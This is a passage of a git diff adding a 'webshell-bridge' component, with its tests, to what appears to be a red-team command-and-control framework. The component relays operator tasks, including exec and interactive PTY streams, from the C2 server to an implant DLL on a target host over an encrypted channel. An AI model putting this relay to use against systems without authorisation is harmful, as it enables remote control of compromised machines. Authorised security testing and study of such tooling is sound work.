delay := retryBaseDelay + for attempt := 1; attempt <= retryMaxAttempts; attempt++ { + select { + case <-ctx.Done(): + return ctx.Err() + default: + } + + if err := channel.Connect(ctx); err != nil { + logs.Log.Debugf("DLL not ready (attempt %d/%d): %v (retry in %s)", + attempt, retryMaxAttempts, err, delay) + if attempt == retryMaxAttempts { + return fmt.Errorf("DLL connect failed after %d attempts: %w", retryMaxAttempts, err) + } + select { + case <-ctx.Done(): + return ctx.Err() + case <-time.After(delay): + } + delay *= 2 + if delay > retryMaxDelay { + delay = retryMaxDelay + } + continue + } + break + } + logs.Log.Important("DLL connected via malefic channel") + + // Inject Age keys before Handshake so the parser can decrypt/encrypt. + if runtime.secureConfig != nil && runtime.secureConfig.Enable { + keyPair := buildInitialKeyPair(runtime.secureConfig) + if keyPair != nil { + channel.WithSecure(keyPair) + logs.Log.Debugf("Age secure mode active for DLL channel") + } + } + + sess, err := NewSession( + b.rpc, b.pipelineCtx(ctx, runtime.name), + sessionID, runtime.name, b.cfg.ListenerName, + channel, + ) + if err != nil { + _ = channel.Close() + return fmt.Errorf("create session: %w", err) + } + + channel.StartRecvLoop() + runtime.sessions.Store(sess.ID, sess) + runtime.sessionsByRawID.Store(channel.sessionID, sess) + return nil +} + +// buildInitialKeyPair assembles a KeyPair from the pipeline's SecureConfig. +// PrivateKey = server private key (to decrypt DLL messages). +// PublicKey = implant public key (to encrypt messages to DLL). +// This mirrors core.GetKeyPairForSession without per-session lookup. +func buildInitialKeyPair(sc *implanttypes.SecureConfig) *clientpb.KeyPair { + if sc == nil || !sc.Enable { + return nil + } + pub := strings.TrimSpace(sc.ImplantPublicKey) + priv := strings.TrimSpace(sc.ServerPrivateKey) + if pub == "" && priv == "" { + return nil + } + return &clientpb.KeyPair{ + PublicKey: pub, + PrivateKey: priv, + } +} + +// connect establishes the mTLS gRPC connection to the server. +func (b *Bridge) connect(ctx context.Context) error { + authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) + if err != nil { + return fmt.Errorf("read auth config: %w", err) + } + + addr := authCfg.Address() + if b.cfg.ServerAddr != "" { + addr = b.cfg.ServerAddr + } + + options, err := mtls.GetGrpcOptions( + []byte(authCfg.CACertificate), + []byte(authCfg.Certificate), + []byte(authCfg.PrivateKey), + authCfg.Type, + ) + if err != nil { + return fmt.Errorf("get grpc options: %w", err) + } + + b.conn, err = grpc.DialContext(ctx, addr, options...) + if err != nil { + return fmt.Errorf("grpc dial: %w", err) + } + + b.rpc = listenerrpc.NewListenerRPCClient(b.conn) + return nil +} + +func (b *Bridge) shutdown() { + if err := b.stopActiveRuntime(""); err != nil { + logs.Log.Debugf("stop active runtime during shutdown: %v", err) + } + if b.jobStream != nil { + _ = b.jobStream.CloseSend() + } +} + +func (b *Bridge) runJobLoop(ctx context.Context) error { + for { + msg, err := b.jobStream.Recv() + if err != nil { + if ctx.Err() != nil || errors.Is(err, io.EOF) { + return nil + } + switch status.Code(err) { + case codes.Canceled, codes.Unavailable: + if ctx.Err() != nil { + return nil + } + } + return fmt.Errorf("job stream recv: %w", err) + } + + // Handle session key sync without sending a status response, + // matching the real listener behavior (server/listener/listener.go:360). + if msg.GetCtrl() == consts.CtrlListenerSyncSession { + b.handleSyncSession(msg.GetSession()) + continue + } + + statusMsg := b.handleJobCtrl(ctx, msg) + if err := b.jobStream.Send(statusMsg); err != nil { + if ctx.Err() != nil { + return nil + } + return fmt.Errorf("job stream send: %w", err) + } + } +} + +func (b *Bridge) handleJobCtrl(ctx context.Context, msg *clientpb.JobCtrl) *clientpb.JobStatus { + statusMsg := &clientpb.JobStatus{ + ListenerId: b.cfg.ListenerName, + Ctrl: msg.GetCtrl(), + CtrlId: msg.GetId(), + Status: int32(consts.CtrlStatusSuccess), + Job: msg.GetJob(), + } + + var err error + switch msg.GetCtrl() { + case consts.CtrlPipelineStart: + err = b.handlePipelineStart(ctx, msg.GetJob()) + case consts.CtrlPipelineStop: + err = b.handlePipelineStop(msg.GetJob()) + case consts.CtrlPipelineSync: + err = b.handlePipelineSync(msg.GetJob()) + default: + err = fmt.Errorf("unsupported ctrl %q", msg.GetCtrl()) + } + + if err != nil { + statusMsg.Status = int32(consts.CtrlStatusFailed) + statusMsg.Error = err.Error() + logs.Log.Errorf("job %s failed: %v", msg.GetCtrl(), err) + } + + return statusMsg +} + +func (b *Bridge) handlePipelineStart(ctx context.Context, job *clientpb.Job) error { + pipe := job.GetPipeline() + if pipe == nil { + return fmt.Errorf("missing pipeline in start job") + } + if pipe.GetType() != pipelineType { + return fmt.Errorf("unsupported pipeline type %q", pipe.GetType()) + } + if err := b.ensurePipelineMatch(pipe.GetName()); err != nil { + return err + } + + secCfg := implanttypes.FromSecure(pipe.GetSecure()) + if secCfg.Enable { + logs.Log.Importantf("pipeline %s: Age secure mode enabled", pipe.GetName()) + } + + runtimeCtx, cancel := context.WithCancel(ctx) + runtime := &pipelineRuntime{ + name: pipe.GetName(), + ctx: runtimeCtx, + cancel: cancel, + secureConfig: secCfg, + done: make(chan struct{}), + } + + b.activeMu.Lock() + if active := b.active; active != nil { + b.activeMu.Unlock() + cancel() + if active.name == pipe.GetName() { + logs.Log.Debugf("pipeline %s already active", pipe.GetName()) + return nil + } + return fmt.Errorf("pipeline %s already active", active.name) + } + b.active = runtime + b.activeMu.Unlock() + + spiteStream, err := b.rpc.SpiteStream(b.pipelineCtx(runtimeCtx, runtime.name)) + if err != nil { + b.clearActiveRuntime(runtime) + cancel() + return fmt.Errorf("open spite stream: %w", err) + } + runtime.spiteStream = spiteStream + + go b.runRuntime(runtime) + logs.Log.Importantf("pipeline %s starting; waiting for DLL at %s", runtime.name, b.cfg.DLLAddr) + return nil +} + +func (b *Bridge) handlePipelineStop(job *clientpb.Job) error { + name, err := b.jobPipelineName(job) + if err != nil { + return err + } + if err := b.ensurePipelineMatch(name); err != nil { + return err + } + logs.Log.Importantf("stopping pipeline %s", name) + return b.stopActiveRuntime(name) +} + +func (b *Bridge) handlePipelineSync(job *clientpb.Job) error { + name, err := b.jobPipelineName(job) + if err != nil { + return err + } + if err := b.ensurePipelineMatch(name); err != nil { + return err + } + logs.Log.Debugf("pipeline %s sync acknowledged", name) + return nil +} + +// handleSyncSession processes CtrlListenerSyncSession from the server. +// The server pushes per-session Age key pairs after a session registers with +// secure mode enabled. We update the channel's parser so subsequent +// reads/writes use the session-specific keys. +func (b *Bridge) handleSyncSession(sess *clientpb.Session) { + if sess == nil { + return + } + + b.activeMu.Lock() + runtime := b.active + b.activeMu.Unlock() + if runtime == nil { + return + } + + rawID := sess.GetRawId() + val, ok := runtime.sessionsByRawID.Load(rawID) + if !ok { + logs.Log.Debugf("sync session: no session for raw ID %d", rawID) + return + } + + session := val.(*Session) + kp := sess.GetKeyPair() + if kp == nil || (kp.GetPublicKey() == "" && kp.GetPrivateKey() == "") { + logs.Log.Debugf("sync session %s: no key pair, skipping", session.ID) + return + } + + // Merge: session-specific private key takes priority, fall back to pipeline's. + merged := &clientpb.KeyPair{ + PublicKey: kp.GetPublicKey(), + PrivateKey: kp.GetPrivateKey(), + } + if runtime.secureConfig != nil { + pipelinePriv := strings.TrimSpace(runtime.secureConfig.ServerPrivateKey) + sessionPriv := strings.TrimSpace(kp.GetPrivateKey()) + if pipelinePriv != "" && sessionPriv != pipelinePriv { + merged.PrivateKey = sessionPriv + "\n" + pipelinePriv + } + } + + session.channel.WithSecure(merged) + logs.Log.Debugf("sync session %s: Age keys updated (rawID=%d)", session.ID, rawID) +} + +func (b *Bridge) jobPipelineName(job *clientpb.Job) (string, error) { + if job == nil { + return "", fmt.Errorf("missing job") + } + if pipe := job.GetPipeline(); pipe != nil && pipe.GetName() != "" { + return pipe.GetName(), nil + } + if job.GetName() != "" { + return job.GetName(), nil + } + return "", fmt.Errorf("missing pipeline name") +} + +func (b *Bridge) ensurePipelineMatch(name string) error { + if name == "" { + return fmt.Errorf("missing pipeline name") + } + if b.cfg.PipelineName != "" && name != b.cfg.PipelineName { + return fmt.Errorf("bridge configured for pipeline %s, got %s", b.cfg.PipelineName, name) + } + return nil +} + +func (b *Bridge) stopActiveRuntime(name string) error { + b.activeMu.Lock() + runtime := b.active + if runtime == nil { + b.activeMu.Unlock() + return nil + } + if name != "" && runtime.name != name { + b.activeMu.Unlock() + return fmt.Errorf("active pipeline is %s, not %s", runtime.name, name) + } + b.active = nil + b.activeMu.Unlock() + + b.stopRuntime(runtime) + return nil +} + +func (b *Bridge) stopRuntime(runtime *pipelineRuntime) { + if runtime == nil { + return + } + + runtime.cancel() + if runtime.spiteStream != nil { + _ = runtime.spiteStream.CloseSend() + } + b.closeRuntimeSessions(runtime) + + select { + case <-runtime.done: + case <-time.After(2 * time.Second): + } +} + +func (b *Bridge) runRuntime(runtime *pipelineRuntime) { + syncStop := false + defer func() { + b.clearActiveRuntime(runtime) + close(runtime.done) + if syncStop { + go b.syncPipelineStop(runtime.name) + } + }() + + if err := b.connectDLL(runtime.ctx, runtime); err != nil { + if runtime.ctx.Err() == nil { + syncStop = true + logs.Log.Errorf("pipeline %s failed before session registration: %v", runtime.name, err) + } + return + } + + logs.Log.Importantf("pipeline %s active", runtime.name) + go b.checkinLoop(runtime) + b.handleSpiteStream(runtime) +} + +func (b *Bridge) closeRuntimeSessions(runtime *pipelineRuntime) { + // Cancel all streaming task pumps first. + runtime.streamTasks.Range(func(key, value interface{}) bool { + value.(context.CancelFunc)() + runtime.streamTasks.Delete(key) + return true + }) + + runtime.sessions.Range(func(key, value interface{}) bool { + runtime.sessions.Delete(key) + _ = value.(*Session).Close() + return true + }) +} + +// listenerCtx returns a context with listener metadata. +func (b *Bridge) listenerCtx(parent context.Context) context.Context { + return metadata.NewOutgoingContext(parent, metadata.Pairs( + "listener_id", b.cfg.ListenerName, + "listener_ip", b.cfg.ListenerIP, + )) +} + +// pipelineCtx returns a context with pipeline metadata. +func (b *Bridge) pipelineCtx(parent context.Context, pipelineName string) context.Context { + return metadata.NewOutgoingContext(parent, metadata.Pairs( + "listener_id", b.cfg.ListenerName, + "listener_ip", b.cfg.ListenerIP, + "pipeline_id", pipelineName, + )) +} + +func (b *Bridge) sessionCtx(parent context.Context, sessionID string) context.Context { + return metadata.NewOutgoingContext(parent, metadata.Pairs( + "session_id", sessionID, + "listener_id", b.cfg.ListenerName, + "listener_ip", b.cfg.ListenerIP, + "timestamp", strconv.FormatInt(time.Now().Unix(), 10), + )) +} + +// handleSpiteStream receives task requests from the server and forwards them +// through the malefic channel to the bind DLL on the target. +func (b *Bridge) handleSpiteStream(runtime *pipelineRuntime) { + for { + req, err := runtime.spiteStream.Recv() + if err != nil { + if runtime.ctx.Err() != nil || errors.Is(err, io.EOF) { + return + } + switch status.Code(err) { + case codes.Canceled, codes.Unavailable: + if runtime.ctx.Err() != nil { + return + } + } + logs.Log.Errorf("spite stream recv (%s): %v", runtime.name, err) + return + } + + spite := req.GetSpite() + sessionID := req.GetSession().GetSessionId() + if spite == nil || sessionID == "" { + continue + } + + var taskID uint32 + if t := req.GetTask(); t != nil { + taskID = t.GetTaskId() + } + + logs.Log.Debugf("task %d for session %s: %s", taskID, sessionID, spite.Name) + go b.forwardToSession(runtime, sessionID, taskID, req) + } +} + +func (b *Bridge) clearActiveRuntime(runtime *pipelineRuntime) { + if runtime == nil { + return + } + if runtime.spiteStream != nil { + _ = runtime.spiteStream.CloseSend() + } + + b.activeMu.Lock() + if b.active == runtime { + b.active = nil + } + b.activeMu.Unlock() + + b.closeRuntimeSessions(runtime) +} + +func (b *Bridge) syncPipelineStop(name string) { + if b.rpc == nil || name == "" { + return + } + _, err := b.rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ + Name: name, + ListenerId: b.cfg.ListenerName, + }) + if err != nil { + logs.Log.Errorf("sync failed pipeline stop for %s: %v", name, err) + } +} + +// forwardToSession routes a SpiteRequest to the appropriate session. +// Streaming tasks (Task.Total < 0) get a persistent response pump; unary tasks +// use the simple request/response path. +func (b *Bridge) forwardToSession(runtime *pipelineRuntime, sessionID string, taskID uint32, req *clientpb.SpiteRequest) { + sess, ok := runtime.sessions.Load(sessionID) + if !ok { + err := fmt.Errorf("session %s not found", sessionID) + logs.Log.Warnf("%v, dropping task %d", err, taskID) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + + session := sess.(*Session) + isStreaming := req.GetTask().GetTotal() < 0 + streamKey := fmt.Sprintf("%s:%d", sessionID, taskID) + + if isStreaming { + // Check if a pump already exists (subsequent command on same stream, e.g. PTY input) + if _, exists := runtime.streamTasks.Load(streamKey); exists { + if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { + logs.Log.Errorf("session %s task %d stream send: %v", sessionID, taskID, err) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + } + return + } + + // New streaming task: open channel, send initial request, start pump. + ch := session.OpenTaskStream(taskID) + if err := session.SendTaskSpite(taskID, req.GetSpite()); err != nil { + session.CloseTaskStream(taskID) + logs.Log.Errorf("session %s task %d initial send: %v", sessionID, taskID, err) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + + pumpCtx, pumpCancel := context.WithCancel(runtime.ctx) + runtime.streamTasks.Store(streamKey, pumpCancel) + go b.responsePump(runtime, session, sessionID, taskID, streamKey, ch, pumpCtx, pumpCancel) + return + } + + // Unary path: send request, wait for one response. + resp, err := session.HandleUnary(taskID, req.GetSpite()) + if err != nil { + logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) + if !session.Alive() { + logs.Log.Warnf("session %s channel dead, removing from runtime", sessionID) + runtime.sessions.Delete(sessionID) + _ = session.Close() + } + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + if resp == nil { + err := fmt.Errorf("empty response from DLL") + logs.Log.Errorf("session %s task %d error: %v", sessionID, taskID, err) + b.sendTaskError(runtime, sessionID, taskID, req.GetSpite(), err) + return + } + + if err := b.sendSpiteResponse(runtime, sessionID, taskID, resp); err != nil { + logs.Log.Errorf("spite stream send: %v", err) + } +} + +// responsePump reads streaming responses from the DLL channel and forwards +// each one to the server's SpiteStream. Runs until the channel is closed, +// the context is cancelled, or a send error occurs. +func (b *Bridge) responsePump( + runtime *pipelineRuntime, + session *Session, + sessionID string, + taskID uint32, + streamKey string, + ch <-chan *implantpb.Spite, + ctx context.Context, + cancel context.CancelFunc, +) { + defer func() { + cancel() + runtime.streamTasks.Delete(streamKey) + session.CloseTaskStream(taskID) + logs.Log.Debugf("response pump exited for task %d on session %s", taskID, sessionID) + }() + + for { + select { + case <-ctx.Done(): + return + case spite, ok := <-ch: + if !ok { + // Channel closed (recvLoop exit or session teardown) + return + } + if err := b.sendSpiteResponse(runtime, sessionID, taskID, spite); err != nil { + logs.Log.Errorf("stream pump send for task %d: %v", taskID, err) + return + } + } + } +} + +func (b *Bridge) sendTaskError(runtime *pipelineRuntime, sessionID string, taskID uint32, req *implantpb.Spite, err error) { + name := "" + if req != nil { + name = req.GetName() + } + if sendErr := b.sendSpiteResponse(runtime, sessionID, taskID, taskErrorSpite(taskID, name, err)); sendErr != nil { + logs.Log.Debugf("send task error response failed: %v", sendErr) + } +} + +func taskErrorSpite(taskID uint32, name string, err error) *implantpb.Spite { + return &implantpb.Spite{ + Name: name, + TaskId: taskID, + Error: iomtypes.MaleficErrorTaskError, + Status: &implantpb.Status{ + TaskId: taskID, + Status: iomtypes.TaskErrorOperatorError, + Error: err.Error(), + }, + Body: &implantpb.Spite_Empty{ + Empty: &implantpb.Empty{}, + }, + } +} + +func (b *Bridge) sendSpiteResponse(runtime *pipelineRuntime, sessionID string, taskID uint32, spite *implantpb.Spite) error { + runtime.sendMu.Lock() + defer runtime.sendMu.Unlock() + + return runtime.spiteStream.Send(&clientpb.SpiteResponse{ + ListenerId: b.cfg.ListenerName, + SessionId: sessionID, + TaskId: taskID, + Spite: spite, + }) +} + +// checkinLoop sends periodic heartbeats for all registered sessions. +func (b *Bridge) checkinLoop(runtime *pipelineRuntime) { + ticker := time.NewTicker(checkinInterval) + defer ticker.Stop() + + for { + select { + case <-runtime.ctx.Done(): + return + case <-ticker.C: + runtime.sessions.Range(func(key, value interface{}) bool { + sess := value.(*Session) + if !sess.Alive() { + logs.Log.Warnf("session %s channel dead, removing", sess.ID) + runtime.sessions.Delete(key) + _ = sess.Close() + return true + } + sess.Checkin(b.rpc, b.sessionCtx(runtime.ctx, sess.ID)) + return true + }) + } + } +} diff --git a/server/cmd/webshell-bridge/bridge_test.go b/server/cmd/webshell-bridge/bridge_test.go new file mode 100644 index 00000000..bf5e3b4a --- /dev/null +++ b/server/cmd/webshell-bridge/bridge_test.go @@ -0,0 +1,509 @@ +package main + +import ( + "context" + "errors" + "fmt" + "io" + "net" + "sync" + "testing" + "time" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/proto/services/listenerrpc" + "github.com/chainreactors/malice-network/helper/implanttypes" + malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" + "google.golang.org/grpc" + "google.golang.org/grpc/metadata" + "google.golang.org/protobuf/proto" +) + +type blockingDialTransport struct { + started chan struct{} +} + +func (t *blockingDialTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { + select { + case <-t.started: + default: + close(t.started) + } + <-ctx.Done() + return nil, ctx.Err() +} + +// badHandshakeTransport returns a connection that sends an invalid malefic frame. +type badHandshakeTransport struct{} + +func (t *badHandshakeTransport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { + clientConn, serverConn := net.Pipe() + go func() { + defer serverConn.Close() + // Send a malefic frame with corrupt payload (invalid protobuf) + frame := []byte{ + malefic.DefaultStartDelimiter, + 0x01, 0x00, 0x00, 0x00, // sessionID = 1 + 0x03, 0x00, 0x00, 0x00, // length = 3 + 0xBA, 0xAD, 0x00, // corrupt payload + malefic.DefaultEndDelimiter, + } + serverConn.Write(frame) + }() + return clientConn, nil +} + +type fakeBridgeRPC struct { + listenerrpc.ListenerRPCClient + + mu sync.Mutex + stopCalls []*clientpb.CtrlPipeline + spiteStream listenerrpc.ListenerRPC_SpiteStreamClient +} + +func (f *fakeBridgeRPC) SpiteStream(ctx context.Context, opts ...grpc.CallOption) (listenerrpc.ListenerRPC_SpiteStreamClient, error) { + if f.spiteStream == nil { + return nil, errors.New("missing spite stream") + } + return f.spiteStream, nil +} + +func (f *fakeBridgeRPC) StopPipeline(ctx context.Context, in *clientpb.CtrlPipeline, opts ...grpc.CallOption) (*clientpb.Empty, error) { + f.mu.Lock() + defer f.mu.Unlock() + f.stopCalls = append(f.stopCalls, proto.Clone(in).(*clientpb.CtrlPipeline)) + return &clientpb.Empty{}, nil +} + +func (f *fakeBridgeRPC) StopCalls() []*clientpb.CtrlPipeline { + f.mu.Lock() + defer f.mu.Unlock() + out := make([]*clientpb.CtrlPipeline, len(f.stopCalls)) + copy(out, f.stopCalls) + return out +} + +type fakeSpiteStream struct { + grpc.ClientStream + + closeOnce sync.Once + closed chan struct{} +} + +func newFakeSpiteStream() *fakeSpiteStream { + return &fakeSpiteStream{ + closed: make(chan struct{}), + } +} + +func (f *fakeSpiteStream) Header() (metadata.MD, error) { return nil, nil } +func (f *fakeSpiteStream) Trailer() metadata.MD { return nil } +func (f *fakeSpiteStream) CloseSend() error { + f.closeOnce.Do(func() { + close(f.closed) + }) + return nil +} +func (f *fakeSpiteStream) Context() context.Context { return context.Background() } +func (f *fakeSpiteStream) SendMsg(m interface{}) error { + return nil +} +func (f *fakeSpiteStream) RecvMsg(m interface{}) error { + <-f.closed + return io.EOF +} +func (f *fakeSpiteStream) Send(*clientpb.SpiteResponse) error { return nil } +func (f *fakeSpiteStream) Recv() (*clientpb.SpiteRequest, error) { + <-f.closed + return nil, io.EOF +} + +func TestHandlePipelineStartReturnsBeforeDLLConnectCompletes(t *testing.T) { + transport := &blockingDialTransport{started: make(chan struct{})} + bridge := &Bridge{ + cfg: &Config{ + ListenerName: "listener-a", + DLLAddr: "127.0.0.1:13338", + }, + transport: transport, + rpc: &fakeBridgeRPC{ + spiteStream: newFakeSpiteStream(), + }, + } + + job := &clientpb.Job{ + Name: "ws-a", + Pipeline: &clientpb.Pipeline{ + Name: "ws-a", + Type: pipelineType, + }, + } + + errCh := make(chan error, 1) + go func() { + errCh <- bridge.handlePipelineStart(context.Background(), job) + }() + + select { + case err := <-errCh: + if err != nil { + t.Fatalf("handlePipelineStart returned error: %v", err) + } + case <-time.After(300 * time.Millisecond): + t.Fatal("handlePipelineStart blocked on DLL connect") + } + + select { + case <-transport.started: + case <-time.After(time.Second): + t.Fatal("background DLL connect was not started") + } + + if err := bridge.stopActiveRuntime("ws-a"); err != nil { + t.Fatalf("stopActiveRuntime failed: %v", err) + } +} + +func TestRunRuntimeSyncsPipelineStopAfterUnexpectedConnectFailure(t *testing.T) { + rpc := &fakeBridgeRPC{spiteStream: newFakeSpiteStream()} + bridge := &Bridge{ + cfg: &Config{ + ListenerName: "listener-b", + DLLAddr: "127.0.0.1:13338", + }, + transport: &badHandshakeTransport{}, + rpc: rpc, + } + + job := &clientpb.Job{ + Name: "ws-b", + Pipeline: &clientpb.Pipeline{ + Name: "ws-b", + Type: pipelineType, + }, + } + + if err := bridge.handlePipelineStart(context.Background(), job); err != nil { + t.Fatalf("handlePipelineStart failed: %v", err) + } + + deadline := time.Now().Add(time.Second) + for time.Now().Before(deadline) { + calls := rpc.StopCalls() + if len(calls) == 1 { + if calls[0].GetName() != "ws-b" { + t.Fatalf("stop name = %q, want %q", calls[0].GetName(), "ws-b") + } + if calls[0].GetListenerId() != "listener-b" { + t.Fatalf("stop listener_id = %q, want %q", calls[0].GetListenerId(), "listener-b") + } + return + } + time.Sleep(10 * time.Millisecond) + } + + t.Fatal("expected background stop sync after connect failure") +} + +// collectingSpiteStream records all sent SpiteResponses for test assertions. +type collectingSpiteStream struct { + grpc.ClientStream + + mu sync.Mutex + sent []*clientpb.SpiteResponse + closed chan struct{} + recvOnce sync.Once +} + +func newCollectingSpiteStream() *collectingSpiteStream { + return &collectingSpiteStream{ + closed: make(chan struct{}), + } +} + +func (s *collectingSpiteStream) Header() (metadata.MD, error) { return nil, nil } +func (s *collectingSpiteStream) Trailer() metadata.MD { return nil } +func (s *collectingSpiteStream) CloseSend() error { + s.recvOnce.Do(func() { close(s.closed) }) + return nil +} +func (s *collectingSpiteStream) Context() context.Context { return context.Background() } +func (s *collectingSpiteStream) SendMsg(m interface{}) error { + return nil +} +func (s *collectingSpiteStream) RecvMsg(m interface{}) error { + <-s.closed + return io.EOF +} +func (s *collectingSpiteStream) Send(resp *clientpb.SpiteResponse) error { + s.mu.Lock() + s.sent = append(s.sent, proto.Clone(resp).(*clientpb.SpiteResponse)) + s.mu.Unlock() + return nil +} +func (s *collectingSpiteStream) Recv() (*clientpb.SpiteRequest, error) { + <-s.closed + return nil, io.EOF +} +func (s *collectingSpiteStream) Sent() []*clientpb.SpiteResponse { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]*clientpb.SpiteResponse, len(s.sent)) + copy(out, s.sent) + return out +} + +func TestForwardToSessionStreaming(t *testing.T) { + // Set up a mock DLL that sends 3 streaming responses for one task + mock := newMockMaleficDLL(t) + defer mock.close() + + const taskID uint32 = 500 + const numResponses = 3 + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Send handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read the initial streaming request + testReadMaleficFrame(conn) + + // Send multiple responses for the same task + for i := 0; i < numResponses; i++ { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + { + Name: fmt.Sprintf("stream-resp-%d", i), + TaskId: taskID, + }, + }, + } + testWriteMaleficFrame(conn, resp, mock.sessionID) + } + }() + + // Build a real channel + session + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + reg, err := ch.Handshake() + if err != nil { + t.Fatalf("handshake: %v", err) + } + _ = reg + + ch.StartRecvLoop() + + session := &Session{ + ID: "test-session", + PipelineID: "test-pipeline", + ListenerID: "test-listener", + channel: ch, + } + + stream := newCollectingSpiteStream() + runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) + defer runtimeCancel() + + runtime := &pipelineRuntime{ + name: "test-pipeline", + ctx: runtimeCtx, + cancel: runtimeCancel, + spiteStream: stream, + done: make(chan struct{}), + } + runtime.sessions.Store(session.ID, session) + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + + // Forward with streaming task (Total = -1) + req := &clientpb.SpiteRequest{ + Session: &clientpb.Session{SessionId: session.ID}, + Task: &clientpb.Task{TaskId: taskID, Total: -1}, + Spite: &implantpb.Spite{Name: "start-pty"}, + } + + bridge.forwardToSession(runtime, session.ID, taskID, req) + + // Wait for all streaming responses to be forwarded + deadline := time.Now().Add(3 * time.Second) + for time.Now().Before(deadline) { + sent := stream.Sent() + if len(sent) >= numResponses { + break + } + time.Sleep(50 * time.Millisecond) + } + + sent := stream.Sent() + if len(sent) != numResponses { + t.Fatalf("expected %d responses, got %d", numResponses, len(sent)) + } + for i, resp := range sent { + expected := fmt.Sprintf("stream-resp-%d", i) + if resp.GetSpite().GetName() != expected { + t.Errorf("response %d: expected %q, got %q", i, expected, resp.GetSpite().GetName()) + } + if resp.GetTaskId() != taskID { + t.Errorf("response %d: expected taskID %d, got %d", i, taskID, resp.GetTaskId()) + } + } + +} + +func TestForwardToSessionUnary(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 1) // Handshake + 1 Spite roundtrip + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + ch.StartRecvLoop() + + session := &Session{ + ID: "test-session", + PipelineID: "test-pipeline", + ListenerID: "test-listener", + channel: ch, + } + + stream := newCollectingSpiteStream() + runtimeCtx, runtimeCancel := context.WithCancel(context.Background()) + defer runtimeCancel() + + runtime := &pipelineRuntime{ + name: "test-pipeline", + ctx: runtimeCtx, + cancel: runtimeCancel, + spiteStream: stream, + done: make(chan struct{}), + } + runtime.sessions.Store(session.ID, session) + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + + // Forward with unary task (Total = 1, not streaming) + req := &clientpb.SpiteRequest{ + Session: &clientpb.Session{SessionId: session.ID}, + Task: &clientpb.Task{TaskId: 1, Total: 1}, + Spite: &implantpb.Spite{Name: "exec"}, + } + + bridge.forwardToSession(runtime, session.ID, 1, req) + + sent := stream.Sent() + if len(sent) != 1 { + t.Fatalf("expected 1 response, got %d", len(sent)) + } + if sent[0].GetSpite().GetName() != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", sent[0].GetSpite().GetName()) + } +} + +func TestHandleSyncSession(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 0) // Handshake only + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + session := &Session{ + ID: "test-session", + PipelineID: "test-pipeline", + ListenerID: "test-listener", + channel: ch, + } + + runtime := &pipelineRuntime{ + name: "test-pipeline", + secureConfig: &implanttypes.SecureConfig{ + Enable: true, + ServerPrivateKey: "AGE-SECRET-KEY-PIPELINE", + ImplantPublicKey: "age1pipeline", + }, + done: make(chan struct{}), + } + runtime.sessions.Store(session.ID, session) + runtime.sessionsByRawID.Store(ch.sessionID, session) + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + bridge.activeMu.Lock() + bridge.active = runtime + bridge.activeMu.Unlock() + + // Simulate CtrlListenerSyncSession from server + bridge.handleSyncSession(&clientpb.Session{ + RawId: ch.sessionID, + KeyPair: &clientpb.KeyPair{ + PublicKey: "age1session-specific", + PrivateKey: "AGE-SECRET-KEY-SESSION", + }, + }) + + // Verify the channel's parser got updated with merged keys + if ch.parser == nil { + t.Fatal("parser should not be nil") + } + // The parser should now have keyPair set (we can verify via WithSecure's effect) + // Since MaleficParser.keyPair is unexported, we verify indirectly: + // the fact that handleSyncSession didn't panic and the channel is still alive + if !session.Alive() { + t.Error("session should still be alive after key sync") + } +} + +func TestHandleSyncSessionUnknownRawID(t *testing.T) { + runtime := &pipelineRuntime{ + name: "test-pipeline", + done: make(chan struct{}), + } + + bridge := &Bridge{ + cfg: &Config{ListenerName: "test-listener"}, + } + bridge.activeMu.Lock() + bridge.active = runtime + bridge.activeMu.Unlock() + + // Should not panic with unknown raw ID + bridge.handleSyncSession(&clientpb.Session{ + RawId: 99999, + KeyPair: &clientpb.KeyPair{ + PublicKey: "age1unknown", + PrivateKey: "AGE-SECRET-KEY-UNKNOWN", + }, + }) +} + +var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*fakeSpiteStream)(nil) +var _ listenerrpc.ListenerRPC_SpiteStreamClient = (*collectingSpiteStream)(nil) +var _ listenerrpc.ListenerRPCClient = (*fakeBridgeRPC)(nil) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go new file mode 100644 index 00000000..7a74bd34 --- /dev/null +++ b/server/cmd/webshell-bridge/channel.go @@ -0,0 +1,273 @@ +package main + +import ( + "context" + "fmt" + "io" + "net" + "sync" + "time" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/logs" + malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" +) + +const ( + handshakeBridgeID uint32 = 0 + connectTimeout = 10 * time.Second + 